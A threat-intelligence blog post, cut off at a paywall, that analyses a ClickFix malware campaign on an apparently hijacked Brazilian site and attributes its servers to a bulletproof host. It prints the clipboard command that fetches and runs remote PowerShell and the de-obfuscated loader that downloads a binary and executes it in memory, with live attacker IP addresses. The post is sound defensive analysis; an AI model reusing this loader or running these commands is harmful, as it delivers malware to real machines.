0xdevbot

0xdevbot

Examining Russian Cyber Crime

A look into Virtualine Technologies

Jul 04, 2026
∙ Paid

Virtualine Technologies is an online hosting service offering VPS, cPanel hosting, and cloud servers, including both Windows and Linux VPS options. The company provides "bulletproof" hosting from offshore locations.

Bulletproof in this context doesn’t mean 99.99999% uptime as some might think. Bulletproof in this context means “come one come all black hats we will look the other way!”

When I first ran into Virtualine it was while reading 2025 Year in Review: Malicious Infrastructure it states “Virtualine Technologies is a Russia-linked hosting provider that advertises its services on Russian-language cybercriminal forums.”1

As a completely unrelated attribution exercise, I chose at random a site that had been reported to abuse.ch

https://urlhaus.abuse.ch/url/3878377/


From first glance nothing significant of note. Malware download through ClickFix, bit of a snooze fest. First step boot up the VM and visit the site, verify that it’s online.

Attack Chain


Classic ClickFix site complete with the fake Ray ID from cloudflare

Great! the site is still up and lets look in my clipboard

<#Verification ID:0k6g097235q05tr6 #>
$global:cfChallenge="challenge.cloudflare.com";
$global:challengeHash="e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855";
$global:confirmChallenge=$true;
iex(irm http://91.92.240.121/?sid=1782864588993-jbok2nld -UseBasicParsing)
<#Verification ID:0k6g097235q05tr6 #>

There it is, iex(irm http://91.92.240.121/?sid=1782864588993-jbok2nld -UseBasicParsing) lets pull that down and see what we get. Caution first! the script is IEX → IRM; we’ll need to remove the IEX first then run it.

$ent_stage3_binary = "http://158.94.208.104/s_enterprise"
try {
    $stage3_binary_iwr = Invoke-WebRequest -Uri $ent_stage3_binary -UseBasicParsing -ErrorAction Stop
    $stage3_binary_content = $stage3_binary_iwr.Content
    $stage3_binary_len = $stage3_binary_content.Length
    $kernel32_inline = @"
using System;
using System.Runtime.InteropServices;
public class Kernel32Class {
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr VirtualAlloc(IntPtr a, uint sz, uint t, uint p);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr CreateThread(IntPtr ta, uint ss, IntPtr sa, IntPtr p, uint cf, out uint tid);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern uint WaitForSingleObject(IntPtr h, uint ms);
}
"@
    Add-Type -TypeDefinition $kernel32_inline
    $MEM_COMMIT = 0x1000
    $MEM_RESERVE = 0x2000
    $PAGE_EXECUTE_READWRITE = 0x40
    $virtualAlloc_call = [Kernel32Class]::VirtualAlloc([IntPtr]::Zero, $stage3_binary_len, $MEM_COMMIT -bor $MEM_RESERVE, $PAGE_EXECUTE_READWRITE)
    if ($virtualAlloc_call -eq [IntPtr]::Zero) { throw "Alloc failed" }
    [System.Runtime.InteropServices.Marshal]::Copy($stage3_binary_content, 0, $virtualAlloc_call, $stage3_binary_len)
    $zero_var = 0
    $create_thread_virtAll = [Kernel32Class]::CreateThread([IntPtr]::Zero, 0, $virtualAlloc_call, [IntPtr]::Zero, 0, [ref]$zero_var)
    if ($create_thread_virtAll -eq [IntPtr]::Zero) { throw "Thread failed" }
    [Kernel32Class]::WaitForSingleObject($create_thread_virtAll, 30000) | Out-Null
    Write-Host "done."
}
catch {
    exit 1
}

note this is post de-obfuscation

Some key points

  1. $ent_stage3_binary = “http://158.94.208.104/s_enterprise”

  2. [Kernel32Class]::VirtualAlloc(…)

  3. [System.Runtime.InteropServices.Marshal]::Copy(…)

  4. [Kernel32Class]::CreateThread(…)

ClickFix → 91.92.240.121 PowerShell script → 158.94.208.104 binary

The s_enterprise binary comes in as an application/octet-stream, with that being the case, adversaries can write that data to a variable in memory enabling a file-less malware strategy. After in-lining a few Kernel32 API calls the adversary Allocates memory with the page being Read-Write-Execute. Next they copy the content of the stream to the allocated memory. Finally, they execute it by creating a thread to the memory allocation.

Lets look at the structure of the code to get a huge insight on what we are dealing with here.

When a Process or Thread is kicked off the loader maps the PE image to the import table; since there is no PE image in our binary the loader can’t do that. With an Import Table the executable can simply just call the DLLs it needs. Without it, the executable needs to walk PEB and find either LoadLibraryA or GetProcAddress. We can quickly verify this by looking at the Hex of the file.

No MZ (4d5a) magic bytes, no PE headers.

Next, lets investigate how the adversary allocates memory for this binary.

VirtualAlloc([IntPtr]::Zero, $stage3_binary_len, $MEM_COMMIT -bor $MEM_RESERVE, $PAGE_EXECUTE_READWRITE)
//from MSDN docs
LPVOID VirtualAlloc(
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
);

The first argument is for lpAddress or “what should the address of the memory allocation be?” The adversary sets it to [IntPtr]::Zero meaning that the adversary does not care where the memory is allocated, Windows will decide.

This is Position-Independent-Code. But, that is a topic for another time.

For now, we will return to attribution.

Attribution


We’ve gathered a good bit of data from the initial attack chain:

  1. absoluteinvestimentos.com.br / 191.233.203.32

  2. 91.92.240.121

  3. 158.94.208.104

  4. User Execution: Malicious Copy and Paste (T1204.004)

  5. Command and Scripting Interpreter: PowerShell (T1059.001)

  6. Reflective Code Loading (T1620)

The Tcodes are great to have but, since this is an exercise in attribution through infrastructure, we only need the first three data points.

absoluteinvestimentos.com.br/191.233.203.32

Pulling DNS records for an IP especially for websites is an easy win. There are a myriad of places to do this but I like dnsdumpster

DNS shows absoluteinvestimentos.com.br (191.233.203.32) is an Azure Web App. Alternatively, we could have checked the what ASN IP Block that IP belongs to.

Considering the DNS records and registrant locality with a .br site I want to quickly check Absolute Investimentos.

The official Linkedin about page website matches the site we are investigating. Combined with Google reviews reaching back 6 years and several independent sites confirming legitimacy.

When visiting the site from a VM I could only get the ClickFix site when I had my configuration set up to show I was visiting from the US or CAN.

At this point I’m comfortable moving forward with the assessment that the site was somehow taken over or additional code was added to the site that ensured only US and CAN visitors received the ClickFix exploit.

Since we deduced that absoluteinvestimentos.com.br is malicious but not really a part of the adversary infrastructure. Lets move on to the two other IPs.

Interestingly enough, both IPs belong to OmegaTech. Looking more into this ASN’s IP space we find more goodies.

OmegaTech and owns IP space connected to Virtualine Technologies.

doveryai, no proveryai
- Russian Proverb

Insikt Group states “Throughout 2025, Railnet provided the routing backbone for infrastructure used by Virtualine Technologies, allowing it to operate infrastructure without directly owning IP address space. This model enables frequent rotation of short-lived prefixes, complicating attribution and prolonging the lifespan of malicious infrastructure”[1] They continue “originally announced via Railnet LLC (AS214943) throughout 2025, shift to AS202412 Omegatech LTD (omegatech[.]sc) as early as January 21, 2026. Insikt Group assesses with high confidence that Omegatech LTD is operated by Virtualine Technologies.”[1]

With that, my assessment:

An unnamed Cyber Crime Threat Group LIKELY gained unauthorized access to absoluteinvestimentos.com.br (191.233.203.32), enabling adversaries to establish a ClickFix style Phishing Campaign. Adversaries will ALMOST CERTAINLY continue ClickFix style exploitation so long as it remains a worthwhile Initial Access vehicle. Additionally, Adversaries will continue to leverage Virtualine Technology infrastructure in-order-to conduct Cyber Crime without scrutiny and Virtualine Technologies VERY LIKELY will maintain full operational functions for the foreseeable future.
0xdevbot makes these assessments with HIGH confidence.

Mitigation, Hunting, & IoCs


User's avatar

Continue reading this post for free, courtesy of 0xdevbot.

Or purchase a paid subscription.
© 2026 0xdevbot · Privacy ∙ Terms ∙ Collection notice
Start your SubstackGet the app
Substack is the home for great culture